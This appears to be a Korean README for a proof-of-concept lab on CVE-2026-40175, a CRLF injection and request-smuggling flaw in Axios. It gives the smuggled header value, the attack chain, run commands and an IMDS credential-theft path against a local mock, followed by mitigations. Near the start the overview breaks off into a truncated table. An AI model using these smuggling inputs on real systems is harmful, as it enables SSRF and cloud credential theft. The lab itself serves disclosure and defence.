Share
## https://sploitus.com/exploit?id=93AE532A-5E5F-5573-AB01-41C96B1A7675
# CVE-2026-40175 β€” Axios CRLF Injection / HTTP Request Smuggling PoC

## κ°œμš”

Axios HTTP ν΄λΌμ΄μ–ΈνŠΈ(`>=1.0.0 =1.0.0 <1.15.0`, `axios <0.31.0` |
| 패치 버전 | `1.15.0`, `0.31.0` |
| CWE | CWE-93 Improper Neutralization of CRLF Sequences |

---

## κ·Όλ³Έ 원인

```
lib/core/AxiosHeaders.js  AxiosHeaders.set()
  └─ normalizeValue()
       └─ /[\r\n]+$/ 둜 ν›„ν–‰ CRLF만 제거
          ↑ κ°’ μ€‘κ°„μ˜ \r\n은 κ·ΈλŒ€λ‘œ 톡과
```

결과적으둜 헀더 값에 `\r\n\r\nGET /admin HTTP/1.1\r\n...`을 μ‚½μž…ν•˜λ©΄
TCP μŠ€νŠΈλ¦Όμ— 두 번째 HTTP μš”μ²­μ΄ κ·ΈλŒ€λ‘œ ν¬ν•¨λœλ‹€.

---

## 곡격 체인

```
[1] 직접 헀더 μ£Όμž… λ˜λŠ” Prototype Pollution
        ↓
[2] axiosκ°€ CRLF 포함 값을 검증 없이 ν—€λ”λ‘œ 직렬화
        ↓
[3] raw net.Socket 으둜 TCP μŠ€νŠΈλ¦Όμ— 기둝
        (Node.js κΈ°λ³Έ http λͺ¨λ“ˆμ€ λŸ°νƒ€μž„μ—μ„œ 차단 β†’ custom adapter ν•„μš”)
        ↓
[4] nginx (proxy_pass http://$http_host) κ°€ 2개 μš”μ²­μœΌλ‘œ 뢄리 νŒŒμ‹±
        ↓
[5] μŠ€λ¨ΈκΈ€λœ μš”μ²­μ˜ Host 헀더 기반으둜 λ‹€λ₯Έ upstream 으둜 λΌμš°νŒ… (SSRF)
        ↓
[6] λ‚΄λΆ€ μ„œλ²„(IMDS λ“±) μ ‘κ·Ό β†’ ν¬λ ˆλ΄μ…œ νƒˆμ·¨
```

### 핡심 쑰건

| 쑰건 | λ‚΄μš© |
|---|---|
| Node.js http λͺ¨λ“ˆ 우회 | `net.Socket` 기반 custom adapter μ‚¬μš© |
| nginx open proxy | `proxy_pass http://$http_host` μ„€μ • |
| `ignore_invalid_headers on` | 비정상 헀더 ν—ˆμš© |
| `resolver` μ§€μ‹œμž | 동적 hostname 해석 κ°€λŠ₯ |

---

## μ•„ν‚€ν…μ²˜

```
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚  Host Machine                                           β”‚
β”‚                                                         β”‚
β”‚  test-axios-adapter-*.js                                β”‚
β”‚  (raw net.Socket β†’ nginx:8080)                          β”‚
β”‚                                                         β”‚
β”‚  browser β†’ exploit.html (3003)                          β”‚
β”‚         β†’ relay (3004) β†’ raw socket β†’ nginx:8080        β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                     β”‚ Docker bridge (cve-net)
          β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
          β–Ό          β–Ό          β–Ό              β–Ό
      backend     nginx       imds           (future)
      :3001       :8080       :80
      :3003                   (169.254.169.254 mock)
      :3004
```

### 포트 맡

| 포트 | μ„œλΉ„μŠ€ | μ—­ν•  |
|---|---|---|
| 3001 | backend | HTTP μš”μ²­ μˆ˜μ‹  / 헀더 λ‘œκΉ… |
| 3003 | backend | exploit.html 정적 μ„œλ²„ |
| 3004 | backend | relay β€” browser POST β†’ net.Socket λ³€ν™˜ |
| 8080 | nginx | open proxy (`proxy_pass http://$http_host`) |
| 80 (λ‚΄λΆ€) | imds | AWS IMDSv2 mock μ„œλ²„ |

---

## μ‹€ν–‰

```bash
# 전체 μ»¨ν…Œμ΄λ„ˆ λΉŒλ“œ 및 μ‹œμž‘
docker compose up --build

# Node.js ν…ŒμŠ€νŠΈ (ν˜ΈμŠ€νŠΈμ—μ„œ μ‹€ν–‰)
npm install
```

### μ‹œλ‚˜λ¦¬μ˜€λ³„ ν…ŒμŠ€νŠΈ

```bash
# 1. λ°±μ—”λ“œ 직접 β€” CRLF μ£Όμž…μœΌλ‘œ 2개 μš”μ²­ λ°œμƒ
node poc/test-axios-adapter-backend.js

# 2. nginx 경유 β€” μŠ€λ¨ΈκΈ€λœ μš”μ²­μ΄ backend:3001 으둜 λΌμš°νŒ…
node poc/test-axios-adapter-nginx.js

# 3. λΈŒλΌμš°μ € β€” http://localhost:3003
#    λŒ€μƒ 선택: λ°±μ—”λ“œ 직접 / nginx 경유 / nginx β†’ IMDS (SSRF)
```

### IMDS SSRF μ‹œλ‚˜λ¦¬μ˜€

```
1. nginx β†’ IMDS 선택 ν›„ Custom Adapter μ‹€ν–‰
2. μŠ€λ¨ΈκΈ€λœ μš”μ²­: GET /latest/meta-data/iam/security-credentials/my-ec2-role
                  Host: imds
3. nginxκ°€ host=imds 둜 λΌμš°νŒ… β†’ IMDSv2 mock μ„œλ²„λ‘œ 전달
4. imds μ»¨ν…Œμ΄λ„ˆ 둜그: [!!!] ν¬λ¦¬λ΄μ…œ νƒˆμ·¨ 성곡!
```

---

## 파일 ꡬ성

```
.
β”œβ”€β”€ docker-compose.yml
β”œβ”€β”€ Dockerfile.backend          # backend + relay μ»¨ν…Œμ΄λ„ˆ
β”œβ”€β”€ Dockerfile.imds             # IMDSv2 mock μ»¨ν…Œμ΄λ„ˆ
β”œβ”€β”€ package.json                # axios@1.14.0 (μ·¨μ•½ 버전 κ³ μ •)
└── poc/
    β”œβ”€β”€ backend-server.js       # HTTP μ„œλ²„ (3001), relay (3004), 정적 μ„œλ²„ (3003)
    β”œβ”€β”€ mock-imds.js            # AWS IMDSv2 mock (PUT /token, GET /credentials)
    β”œβ”€β”€ nginx-container.conf    # open proxy μ„€μ •
    β”œβ”€β”€ exploit.html            # λΈŒλΌμš°μ € PoC (XHR vs Custom Adapter)
    β”œβ”€β”€ test-axios-adapter-backend.js  # raw socket β†’ backend 직접
    β”œβ”€β”€ test-axios-adapter-nginx.js    # raw socket β†’ nginx β†’ backend/imds
    └── test-axios-no-adapter.js       # ν‘œμ€€ axios (Node.js 차단 ν™•μΈμš©)
```

---

## nginx μ„€μ • (핡심)

```nginx
resolver 127.0.0.11 valid=30s;   # Docker λ‚΄λΆ€ DNS

location / {
    proxy_pass         http://$http_host;   # Host 헀더 기반 동적 λΌμš°νŒ… = SSRF
    proxy_http_version 1.1;
    proxy_set_header   Connection "";
    proxy_set_header   Host $http_host;
}

location /public {
    proxy_pass         http://backend:3001;  # 정상 μš”μ²­μš© κ³ μ • upstream
}
```

`$http_host`(포트 포함)λ₯Ό upstream으둜 μ‚¬μš©ν•˜λ―€λ‘œ, μŠ€λ¨ΈκΈ€λœ μš”μ²­μ˜ Host 헀더가
κ³§ λΌμš°νŒ… λͺ©μ μ§€κ°€ λœλ‹€.

---

## μ™„ν™”

```bash
npm install axios@^1.15.0
```

패치(`1.15.0`)λŠ” `assertValidHeaderValue()`λ₯Ό λ„μž…ν•΄ CR/LF 포함 값을 μ¦‰μ‹œ κ±°λΆ€ν•œλ‹€.

μΆ”κ°€ λ°©μ–΄:
- nginxμ—μ„œ `proxy_pass http://$http_host` κΈˆμ§€ β†’ κ³ μ • upstream μ‚¬μš©
- IMDSv2 μ „μš© κ°•μ œ (`HttpTokens: required`)
- EC2 μΈμŠ€ν„΄μŠ€ ν”„λ‘œν•„ μ΅œμ†Œ κΆŒν•œ 적용

---

## References

- [NVD - CVE-2026-40175](https://nvd.nist.gov/vuln/detail/CVE-2026-40175)
- [Miggo Vulnerability DB](https://www.miggo.io/vulnerability-database/cve/CVE-2026-40175)
- [Aikido β€” Is it really exploitable?](https://www.aikido.dev/blog/axios-cve-2026-40175-a-critical-bug-thats-not-exploitable)
- [CVEReports](https://cvereports.com/reports/CVE-2026-40175)